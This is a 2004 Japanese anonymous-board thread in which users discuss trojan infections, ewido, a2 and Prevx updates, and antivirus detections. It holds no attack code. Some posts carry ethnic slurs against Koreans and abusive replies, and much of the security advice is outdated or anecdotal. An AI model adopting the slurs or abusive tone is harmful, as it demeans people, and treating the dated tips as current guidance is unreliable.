            l  l_..-′ .!''''''′ /                !  .l'''ァ . /   .!  |
             ヽ ,,,_,、  .i'''''ー- ヾ                !  .!',∠ン -―ー″  !
           `'',゙,,..ノ  .!''"´`゙',i                  l゙‐''′  .,, -ー''';;;;''''-、 /
             'ゞ ......=@,, -‐''"                `--/′ )   `'' ゙̄''ゞ、
            ...,,,i  .!------― ,,               ,/゛ .,/゛     .'ヽ  ゙'、
       .(''''''''"゙゙_,,.. -ー''''''''''―- ..,,,,_ `'、            xニ,,.. -'″           \  |
        ゙'ー'"゛                ´                         `'゛

401 名前:名無しさん@お腹いっぱい。 mailto:age [04/10/13 20:42:41]
苺キンタマ



402 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/13 23:28:37]
ewidoうpだて

403 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/14 06:30:45]
>>402
GJ

404 名前:名無しさん@お腹いっぱい mailto:sage [04/10/14 16:59:42]
Swat Itとa2 freeはどちらが評判いいんですか?
スレだとSwat Itは話題になってないようですが。



405 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/15 00:31:40]
最近、毎晩TOKAI-NETのIPから攻撃がある

406 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/15 18:00:14]
ewidoフォルダにある gdiplus.dll って問題ないの?

407 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/15 18:03:28]
あ gdiplus.dllとewidoで検索したらJPEG関係ないから大丈夫みたい

408 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/15 21:49:10]
誰かマジでewidoのすれ立ててくれ。

409 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/16 06:38:32]
ewidoを入れてる人、日本語入力中にCTRL + F10などして、
IMEパッドから「手書き」の呼び出しが正常に出来ますか?

410 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/16 08:18:53]
この方は私たちに理由もなくCtrl+F10を押すことを強要しているのですね

411 名前:名無しさん@お腹いっぱい。 [04/10/16 12:02:54]
助けてください
毎晩チョんが木馬に乗って攻めてきます



412 名前:名無しさん@お腹いっぱい。 [04/10/16 13:59:42]
>>411
漏れも・・・マカヒー入れても食らった。退治できたけど

413 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/16 16:14:17]
211.175.39.189が、
KOREAから攻めてきました

414 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/16 16:47:15]
FW入れとけよ

415 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/16 22:50:15]
>>404
SwatIt Free はほとんど更新無し。(年に数回しかない)
暫らく使ってたけどやめた。
SwatIt の有償版を使ってる人っているのかな?
有償版の更新頻度が気になるが。

416 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/16 22:58:28]
a2 Verうpまだなのかな…

417 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/17 18:57:03]
>>378
NetBusはそれ自身がサーバとして働いているタイプものだけど昨今のスパイウェアのように
遠隔地に置いてある指令所のホストにあくまでクライアントとして接続して命令を受け取り実行するといったタイプのほうが増えていると思う


418 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/18 17:09:07]
クライアントならFW突破するのも造作もないからね‥

419 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/18 17:38:46]
>>417
>クライアントならFW突破するのも造作もないからね‥
理解できない。FW突破する手口をきぼん。

420 名前:名無しさん@お腹いっぱい。 [04/10/18 17:49:02]
サーバー側が80番ポートならWebアクセスと認識するからって意味じゃない?


421 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/18 18:19:20]
>>419
普通、FWはアプリとポートを組み合わせてルールを作るので、80ポートならなんでも
OKとはいかないよ。



422 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/18 19:03:27]
FWと言ってもルーター上でのフィルタリングとかNATとかの意味じゃないの?
突破とは言わないけどw

423 名前:名無しさん@お腹いっぱい。 [04/10/19 11:11:29]
ewidoがver3.0のうpだてしますか?とか聞いて来るんだが
エロい人解説キボンヌ…

424 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/19 11:18:40]
すごいうpだてキタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!!!!!!

425 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/19 11:53:46]
2回も再起動させんのかよ
なめてるから後回し

426 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/19 16:43:00]
インスコする時backgroundguard聞かれるけど後でも設定できるみたい

427 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/19 17:29:41]
会社のデスクトップ機でv3にアップデート実行。皆さん仰せの通り、2回再起動
させられる。タスクバーのアイコンを右クリックすると、従来一番下にあった
"Launch main program"が一番上に行って、一番下に"shutdown guard"が
来たのがびっくりさん。

現在v3.0でスキャン中だが、これまで引っ掛からなかったトロイを1個引っ掛けた。

428 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/19 21:08:12]
Additinal Options

Select additional Options for the Installations.

Install background guard(recommended)
Install Shell-Extension

429 名前:名無しさん@お腹いっぱい。 [04/10/19 23:58:43]
金払った覚えはないのに、ewidoが2週間以上常駐保護してる気がします。
起動のたびにewidoが常駐し、 realtime protection にチェックが入ってるんです。
また、status の license information の package: が plus になってます。
これ有償版って事ですか?なぜ?

あと、新バージョンって、スキャン対象で +everything 押すたびに
ドライブが繰り返し登録されていきますね。
前は何回押しても一通りしか登録されなかったのに。

430 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 00:27:02]
>>429
ver.3.0になってからplusになってるね
「機能制限なし」だってヽ(´∀`)ノ

多分、次のうpだてで修正されるだろうけど・・・

431 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 14:54:22]
新しいPCにはewidoを入れてなかったが、>>429,430を見て今試しに入れてみたら
ちゃんとdemo版になっている。もう修正されたのだろうか?
ちなみに+everything 押すたびにドライブが繰り返し登録されていくのは修正されていない。



432 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 15:07:30]
今日うpだてしたよ

433 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 17:56:59]
Install Shell-Extension

これ選択すると.exeが常駐するね。

434 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 18:54:06]
>>433
ewudoctrl.exe
コイツは何者でつか?

435 名前:434 mailto:sage [04/10/20 19:00:31]
素でスペル間違った…

?? Install background guard(recommended)
→ewidoguard.exe常駐

?? Install Shell-Extension
→ewidoctrl.exe常駐

436 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 19:06:05]
>>435
Shell-Extensionを選択しなくてもewidoctrl.exeは常駐するみたい。

437 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 19:45:06]
もまいら、別スレ立てれば?
使い方とかのやりとりは勘弁してくれ。

438 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 20:58:06]
>>435
上のはアイコンが常駐する
下のは拡張機能じゃないの

439 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/20 22:16:37]
Shell-Extensionも知らないとは。

440 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/21 00:16:56]
>>437
ewido【Trojan Horsesが気になる貴方に】
pc5.2ch.net/test/read.cgi/sec/1098285373/

441 名前:名無しさん@お腹いっぱい。 [04/10/21 16:28:31]
nycrkldr15.exeを使って今まで普通にウイニー2してたんですがさっきトロイだと解り即ウイニーごと削除しました。

検索してたら>>27-30の会話だけが引っかかってここにたどりついたのですが

nycrkldr15.exeのトロイの木馬はどんな症状になるのか教えてください。



442 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/21 19:29:06]
>>441
>>27-29

443 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/21 19:40:47]
ワロタ

444 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/21 19:47:18]
>>441
ewido aヨ bitdefender pandaで異常なし

445 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/21 20:52:22]
ewidoってマニュアルねーの?

446 名前:441 [04/10/21 22:11:47]
Trojan Horseとしか書いてありませんが?
ewidoって何ですか?


447 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/22 00:04:43]
あんたこそ何ですか?

448 名前:名無しさん@お腹いっぱい。 [04/10/22 15:32:11]
ウィルスバスターコーポレートで【TROJ_Linage.E】というウィルスが発見されました。
トレンドマイクロはもちろん、他のサイトやgoogleで調べても
ほとんど情報がありません。ちなみに感染経路もわかりません。メールの送受信も
してませんし、サイトも見てない時にいきなり発見されました。P2Pも
立ち上げてなかったので関係ないと思います。かなり新しいウィルスかなぁ・・
それにしても名前がリネージュって・・(^^;)誰か知りませんか?

449 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/22 15:40:22]
>>448
メーカーに直接電話かメール

450 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/23 23:14:52]
新潟の友人に電話してみたら
「PCのセキュリティは無問題だけど家のセキュリティはボロボロになった」
って返事が来た…

451 名前:名無しさん@お腹いっぱい。 [04/10/23 23:19:01]

       ,,,,,,,,,,                          ,,ii,,、         ,,,i,,、  
      .,lllllllll,,,,,,,,,,,,,,,,,,,,,,,                  ,iillllllllllii,,    ,,,iillllllllii,,,  
  iiiiiiiillllllllllllllllllllllllllllllllllllllll|                ゙゙!lllllllllllllir .,,,iilllllllllllllll!゙゙′
  .llllllllllllllllllllllllll!!!!!!!!!!!!!!!!!″                ゙゙!!ll!゙",,,iilllllllllllll!!゙゙゜   
  .゙゙゙゙゙゙”゛ llllllllllliiiiiiii,,,,,,,、                       ,,,iillllllllllll!!゙゙゜ ___,,,,, 
    ,,,iiillllllllllllllllllllllllllllllliii,,                  ,,,,,,,,,iiiiiiilllllllllllllllllllllllllllllllllllllllll 
  .,,illlllllllllllllllllll゙゙゙゙゙゙!!llllllllllllli,    .,,,,,iiiiiiiiiiiiiiiiiii,,,、  .llllllllllllllllllllllllllllllllllllllllllllllll!!!!!!l 
  ,illllllllll!゙゙llllllllll|  ,illlllllllllllllll,  liilllllllllllllllllllllllllllllllli,,  lllllllllll!!lllllllllllllll!!゙゙゙”`     
 ,llllllllll゙ .lllllllllll .,,illlllllllllllllllllll、 ゙llllll!!゙゙゙’   ゚゙llllllllll  ゙゙”`.,illllllllll!l゙’         
: llllllllll° .llllllllllll,illllllllll!゙`lllllllllll  .゙゙゜      ,llllllllll!   ,llllllllllll°         
: llllllllll,  lllllllllllllllllll!゙゜ ,lllllllllll          ,,,illllllllll!゜   .llllllllllllli,_    ,,,,,,,,iiiiiii、 
: 'lllllllllllliiilllllllllllllll!!゙’  ,lllllllllll°    .,,,,iiillllllllllll!゙゜    ゙!llllllllllllllllliillllllllllllllllllllllll,、 
 .゙!!lllllllllllllllll!!!゙゙`   .l!!llllllll°    .゙!lllllll!!!゙°     ゙゙!!llllllllllllllllllllllllllllll  



452 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/24 14:29:04]
ewidoうpだて

453 名前:名無しさん@お腹いっぱい。 [04/10/24 15:20:56]
nycrkldr15ってウイニーのクラックは何するもの?

454 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/24 17:12:08]
>>452
向こうに書き込め。

>>453
お前は出入禁止。

455 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/25 00:06:40]
ewidoスレ終わってるじゃんw

456 名前:名無しさん@お腹いっぱい。 [04/10/25 05:00:18]
ewidoうpだてキタ━━━━━━(゚∀゚)━━━━━━ !!

457 名前:名無しさん@お腹いっぱい。 [04/10/27 07:38:03]
ewidoって2週間以上も使えるけど、
うpデートとかサポートがそれ以上適用されなくなるんだろ?

漏れ知らないで使ってたから
なんか2週間後に急にごちゃごちゃいじられるのはじまったから
少し焦ったけどな。スレ違いスマソ。

458 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/27 08:11:06]
>>457
>うpデートとかサポートがそれ以上適用されなくなるんだろ?

ということは定義ファイルうpデートしてもスキャンの時に
古い定義ファイルを使われるってこと?

459 名前:名無しさん@お腹いっぱい。 [04/10/27 09:38:16]
質問です。
エロサイトを巡回中ノートン先生が
Trojan horseを見つけたその後
修復出来ませんでしたのメッセージ
ewidoでまずメモリースキャンしたが検出されず
Trojanが入っている場所
Documentos and Settings/ユーザー名/ApplicationDataを
スキャンしても検出されず
A2で同様のフォルダーをスキャンするも
検出されなかった。
これはTrojanには感染してなかったって事でしょうか?
あと、ewido(無償版)をウPデートしたら、
Databaseが無くなりましたっぽいメッセージがでるのですが
これは使えなくなったってことでしょうか?
長文すみません。


460 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/27 12:37:24]
>>459
オンラインスキャンすべし
それとトロイがあると思われるフォルダを調べる

>>Databaseが無くなりましたっぽいメッセージがでるのですがこれは使えなくなったってことでしょうか?
使えなくなったっぽい・・・としか言えない

461 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/29 02:48:50]
ewidoをupdateしたら日本語になった。



462 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/29 17:19:38]
なんか
r'⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒ヽ ⊂゙⌒゙、∩
ヽ__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__ノ  ⊂(。A。)キタ━━━━━━━━!!!!!!

463 名前:帆船8●1 mailto:sage [04/10/29 18:29:24]
>>461

   ノノノノ
  (*゚∋゚) !!
 ̄ ̄| ̄ ̄| ̄|⌒ヽ
 ̄| ̄ ̄| ̄ ̄|゚ω゚) !! 
 ̄ ̄| ̄ ̄| ̄|⌒丶
 ̄| ̄ ̄| ̄ ̄|从wノ  
 ̄ ̄| ̄ ̄| ̄|Д゜ノ !!
 ̄| ̄ ̄| ̄ ̄| /
 ̄ ̄| ̄ ̄| ̄|∀・) !!
^^^^^^^^^^^^^^^^^^^

464 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/29 20:41:45]
ホントだ、いきなり無言で日本語化されたのでビックリしたぞ(笑)

465 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/29 20:52:34]
ewido常駐、こんなにCPU食ったっけ?

466 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/29 22:12:24]
日本語化ワロタ
驚いた

467 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/29 22:24:21]
ewido苺キンタマには即対応するしネラーいるんじゃないの?w

468 名前:名無しさん@お腹いっぱい。 [04/10/29 22:26:11]
うるせーデブ

469 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/01 13:58:55]
日本語化で笑っていたら今度はアップデートできなくなった
なんだこりゃ

470 名前:名無しさん@お腹いっぱい。 [04/11/01 16:18:10]
最近、ノートン先生がやたらとトロイの木馬の侵入を検知して
遮断するのだが、はやってるのでしょうか・・
あと少し前に流行した445が多いみたいです。

471 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/01 16:31:52]
>>470
ttp://www.cyberpolice.go.jp/detect/observation.html

いつものこと
Blockしてるんなら気にしないでいいんでないの



472 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/01 17:18:48]
>>471
そうっすか・・こんなサイトがあったのですね。ありがとう。
参考までに最近トロイの木馬攻撃をしてきた出元は
アメリカのセントルイスとサンノゼの2都市でした。

473 名前:名無しさん@お腹いっぱい。 [04/11/01 18:50:58]
NAVのログに「Trojan horse」と脅威名が出てるんですが
これはトロイの木馬の総称って事ですか?
修復できていないようで怖いです

474 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/01 22:11:54]
ewido【Trojan Horsesが気になる貴方に】
pc5.2ch.net/test/read.cgi/sec/1098285373/

475 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/01 22:39:30]
a2 update

Downloading Common signature update 10/31/2004 ...
12 new signatures added - and by the way: Happy Halloween! :)

476 名前:名無しさん@お腹いっぱい。 [04/11/01 23:51:31]
びっくりしたぁ〜突然、ewidoが日本語になった。

477 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/02 00:15:23]
seeq何とかという広告がでてくるけどトロイ?
ググッたけどでてこなかった。

478 名前:名無しさん@お腹いっぱい。 [04/11/03 04:21:18]
トロイに感染した後あるテキストファイルがなくなりました、
検索してもひっかからないし削除した憶えもありません、
ハッキングされ盗まれたのでしょうか?



479 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/03 10:55:52]
それだけの情報で、本気で他人に判断を仰ぐというのか

480 名前:478 [04/11/03 11:39:28]
なぜかごみ箱の中に「俺厳選!!エロ画像総特集.TXT」が見つかりました
これからはきちんとバックアップを取りたいと思います

481 名前:いなむらきよし [04/11/03 16:00:49]
奇形もバックアップ(^^)



482 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/03 18:59:52]
ニュース実況+で踏んでしまった..._| ̄|○

483 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/03 21:22:32]
a2 update

484 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/05 16:31:47]
うわっ
a2も今日ヒサビサに立ち上げてみたら
容姿が変わってたから
ビビッた

485 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 05:50:01]
>>3にあるオンラインチェックのttp://onlinecheck.emsisoft.com/en/はやらないほうがいいぞ
一回チェックしてみたら最後、全然そのページも開いてない時でさえ
延々となんか送ってきてる。先生が遮断しているけどうざくてしょうがない。悪質サイトだな。

486 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 14:42:39]
NOD32を使えば全て解決しますよ♪
素晴らしいソフトです。

487 名前:名無しさん@お腹いっぱい。 [04/11/09 17:53:29]
常駐保護するなら、これはなかなか優れものと思うが。
オレは常駐保護の期限の切れたewidoと組み合わせて使ってる。

Prevx Home - Version: 2.0 free security product
www1.prevx.com/prevxhome.asp

488 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 18:08:16]
>>487
面白そう。

489 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 21:15:26]
>>487
これってFireWallなの?

490 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 21:32:12]
Firewall、Anti-virus との比較表を見れば違うのがハッキリ分かると思うがねぇ。
アンチハッカー、アンチトロイ、アンチスパイの常駐して監視、保護してくれる
総合セキュリティツール。


491 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 21:36:01]
>>487
常駐時メモリどの位食う?



492 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 21:56:31]
ratan.dyndns.info/virus/PrevxHome/
ここを読む限りでは、とにかく新しくソフトをインストールするような動きを
監視するソフトっぽいですな。

493 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/09 22:02:43]
元バスターユーザーを装ってノートンスレを荒らしにきた雑音が、
自演をミスる醜態を晒してたよ。
115と名乗るべきところを118と書いてしまったという(w

pc5.2ch.net/test/read.cgi/sec/1099893189/115-119
115 名前:名無しさん@お腹いっぱい。  投稿日:04/11/09 17:07:19
本日から、バスターからノートン2005に乗り換えたんですが、スキャンで
ウィルスが検出されましたが、自動で修復してくれました。その時のウィルス
の詳細が知りたいのですが、ウィルスのログが探してもどこにあるかわかりません。
すみませんが、教えてください。お願いいたします。
------------------------------------------------------------------------------
118 名前:名無しさん@お腹いっぱい。  投稿日:04/11/09 17:09:20
>>115
レポート→検疫項目を表示
------------------------------------------------------------------------------
119 名前:118   投稿日:04/11/09 17:13:04
すみません。ありがとうございます。
バスターより複雑なので、迷ってしまいました。
『VBS.LoveLetter.Var』というのが検出されてましたが、シマンテックの
HPのウィルス辞書には、ないのですがどうしてなんですか?
重ね重ねお願いいたします。

494 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/10 19:26:18]
Abtrusion Protector と似てるの?

495 名前:名無しさん@お腹いっぱい。 [04/11/11 01:18:59]
TrojanSpy.Win32.Agent.lというトロイに感染しますた。
Spybot,AVG,BitDefender,プリインスコされてたマカフィーと試しましたが駆除できず。
駆除できるよってな情報お持ちの方おられましたら教えてください。。

496 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/11 04:38:07]
>>495
pc5.2ch.net/test/read.cgi/sec/1092988445/740

497 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/11 04:48:57]
ewidoのサイトのデータベースで検索したところ
TrojanSpy.Win32.Agent.lは引っかからなかったです。。

498 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/11 05:36:16]
>>497
で?

499 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/11 05:43:15]
ttp://www.a-2.org/en/malware/?TrojanSpy.Win32.Agent.l
リカバリだな。

500 名前:名無しさん@お腹いっぱい。 [04/11/12 02:53:43]
cornelius 18 from Nakameguro to Everywhere
ex5.2ch.net/test/read.cgi/musicj/1097624180/706

>>706が、IP抜いたと騒いだり、トロイをしかけたなどと宣言しているけれど、
ほんとのことなの?ほんとだったら犯罪じゃない?


501 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 05:26:24]
リカバリだな。



502 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 08:01:05]
いやロカビリだろ

503 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 08:02:15]
リハビリだよ

504 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 10:31:57]
ローゼンカバリだよ

505 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 11:18:37]
カバディっしょ

506 名前:名無しさん@お腹いっぱい。 mailto:age [04/11/12 18:59:04]
質問でつ

Zipファイルの中にあるexeファイルにトローイのやろいを発見したのれすが、
解凍してexeを実行しない限り感染しないのれすか?
つまり実行しなければウイルスと同じように、解凍したり解凍ソフトで
zipの中身を参照しても感染しないということでつか?


507 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 19:05:18]
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

508 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 21:31:20]
最近WINDOWSを立ち上げると、mIRC32という名前のDOSウインドウが現れるようになった。
ちょっと調べたところ、トロイ系のウイルスみたいだったのでAVASTとシマンテックでスキャン
したんだけど、効果無しでした。
誰か対処方法を教えてくれ〜!!!

509 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/12 22:04:06]
テンプレ

510 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/13 23:10:02]
>>508
一回死ね

511 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/14 02:25:05]
      ?       ?
      ??     ??
    ????   ????
   ??????????????
 ?????????????????
 ?????????????????
 ?????????????????
 ?????????????????
  ???????????????
    ????????????
  ???????????????
 ?????????????????



512 名前:名無しさん@お腹いっぱい。 [04/11/14 18:45:53]
すいません、初心者です。
ウイルスにかかって、ウイルスバスターズで検索したところ
15個ファイルが見つかりました。
(ウイルスにかかってから、バスターズをダウンロードしました)
削除も隔離もできませんでした。
TROJ_DYFUCA.M
TROJ_DYFUCA.CRがみつかりました。
Meを使ってます。
調べたところ、
手動削除手順:
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、
ウイルス検索を行ってください。
この不正プログラムは「TROJ_DYFUCA.M」として検出されます。
検出されたファイルはすべて「削除」してください。

と書かれてありました。
手動で削除しなさい、とも書いてあったのですが何度読んでも
理解できません。
パソコンのどこから開いて何を削除したらよいのでしょうか?
過去ログを読んでも難しくて実は理解できてないです。
どなたか親切な方、お願いします。教えて下さい。

513 名前:名無しさん@お腹いっぱい。 [04/11/15 00:16:10]
お尋ねします。
Trojan horse BackDoor.Agent.2.H に感染しました。
OSはwindowsXP。サービスパック@のときの感染です。現在は、サービスパックAです。
AVGで判明です。困っています。よろしくです。

514 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/15 03:16:52]
>>513
>>3のオンラインチェックしてみ。

パクリテンプレ
【1-20を読んだか】
【使用OS】
【WindowsUpdateしてるか】
【AntiVirus/AntiTroyは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス/トロイ名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

515 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/15 08:15:52]
ewidoでTrojanDownloader.VB.dbが見つかりました。
ログ↓

C:\WINDOWS\Downloaded Program Files\PPSDKActiveXScanner.INF ->
   TrojanDownloader.VB.db -> バックアップ後削除

トレンドマイクロやシマンテックやa2やewidoのデータベース見ても、
どういうトロイかわかりません。これなにするやつですか?
削除したらそれで問題ありませんか?
XPhomeSP2です。

516 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/15 19:53:03]
>>515
ewido【Trojan Horsesが気になる貴方に】
pc5.2ch.net/test/read.cgi/sec/1098285373/

517 名前:名無しさん@お腹いっぱい。 [04/11/15 21:21:49]
削除できたのに
コマンドプロンプトで netstat -a
したら ESTABLISHED が出ています
まずいですか?

518 名前:名無しさん@お腹いっぱい。 [04/11/16 00:44:55]
で、君たちはいったいどこでそんなの拾ってくるんだい?
まっかく、こっちがききたいわ

519 名前:名無しさん@お腹いっぱい。 [04/11/17 21:44:23]
で、>>487はどうなのよ?

520 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/18 19:09:54]
>>519 お手軽ツールなのかと思ってたけど
激しく強力なツールな気がする。
常駐機能のみ。拒否、確認、お知らせのみ?の
3段階で各項目を事前に設定する必要が有る。
デフォのままで良いと思うけど。

感覚的にはSSMの細かい設定が出来ない版って
感じがした。動作は軽くてUIは黒が基調でカコイイ。


521 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/18 20:51:30]
お、インスコした人いるのか。
copycat試してホスイ。



522 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/18 21:36:07]
Prevx試してみようと思たがXP、2000じゃないとだめなのか…
Meは(・∀・)カエレ!!ってことで挫折orz

523 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/18 23:41:32]
XPだけどPrevx Home 2.0インスコできねぇ。。
なんかインストールの途中でエラーがでて終わっちまう orz

524 名前:523 mailto:sage [04/11/18 23:48:44]
その時のエラーメッセージ。

Error 1720. There is a probles with this Windows Installer
package. A script required for this install to complete could not be
run. Contact your support personnel or package vender.

525 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/19 00:54:49]
勝手にサービス切って騒いでるだけだろ

526 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/19 03:11:11]
あーっ!もう!韓国からのトロイ攻撃多すぎる。
誰か何とかしてくれ。

527 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/19 06:55:47]
全く無知で英語も理解できず、翻訳などと努力する事もしない、
そんな漏れもPrevx Home 2.0入れてみた
v2.0は>>492さん紹介のサイトのような登録は必要無いが、
ほんとにデフォルトでいいのか不安だ・・・
なにせやる事が無いからw
確かに軽くていいね
updateの間隔も設定できるからほんと、やる事無くなるのよね

日本語化出来ますように・・・他力本願
copycatは何方かヨロ


528 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/19 07:35:03]
prevxはアウトバウンドも面倒見てくれるのか?

529 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/19 11:49:56]
>>528 セキュリティーセッティングって所が
設定する場所なんだけど簡易SSMみたいな感じで
FW機能は無いみたい。

530 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/19 22:00:32]
>>529
ということは、アプリケーションを起動しようとすると、
起動していいかどうかダイアログが出るの?

531 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/20 00:04:34]
出ない

各種セキュリティのうpに一々鬼のようにポップアップしやがる
アラートが出てる間は当然うpインスコは中断してる訳だが。
一度のallow/denyでうpだて完了まで大人しくさせるにはどうやるんだ?
「this event〜」だとムリで、
その下のでもすぐにポップしてくるし
ewidoのver.UPの時のようにシグネーチャー総どっかえみたいな時が心配だw

ヘルプ読むか 土曜だし





532 名前:531 mailto:sage [04/11/20 00:29:16]
自己解決
ちなみに
常駐アイコン右クリ「Trusted Installation」のようだ
試そうにもうpだて出来るのが無い
何かインスコするのもめんどい

533 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/20 06:35:25]
ewidoの古いシグネーチャー総どっかえ、早速来たが反応せんかった

534 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/20 18:13:39]
ってことはcopycatはブロックできなさそうだな。
code注入後にアラートみたいな。

535 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/20 19:13:44]
が、ノートン定義ファイルにはシツコク反応するんだよなぁ
ewidoのシグネチャとノートンの定義ファイルとどう違うのかワシには分からんw

536 名前:名無しさん@お腹いっぱい。 [04/11/20 19:42:27]
アンチウイルスソフトを入れているのに、なおかつ
アンチトロイソフトを入れるメリットってあるの?
あと、アンチウイルスソフトは複数入れちゃいけないのが常識。
アンチウイルスソフトとアンチトロイソフトはバッティングしないの?

537 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/21 02:17:31]
アンチウイルスはトロイには弱いのでアンチトロイも入れるべし
アンチウイルスを常駐させてアンチトロイは非常駐でつかえば
バッティングしない(右クリ用で使うとか)

538 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/21 03:10:46]
常駐についてこんな意見も
>おまいら勘違いしすぎ。
>a2にでもこれにしても、金払って常駐監視させて使うのが本道のツールなんだよ。
>トロイはマシンに進入されたらもうアウトだと思うぐらいじゃないとな。
>トロイはそんなに甘いもんじゃない。
>フリーが役に立つのは子供でも気付くアーカイブの中に入っている悪戯appを見つけることぐらいだよ。
ewido【Trojan Horsesが気になる貴方に】
pc5.2ch.net/test/read.cgi/sec/1098285373/103

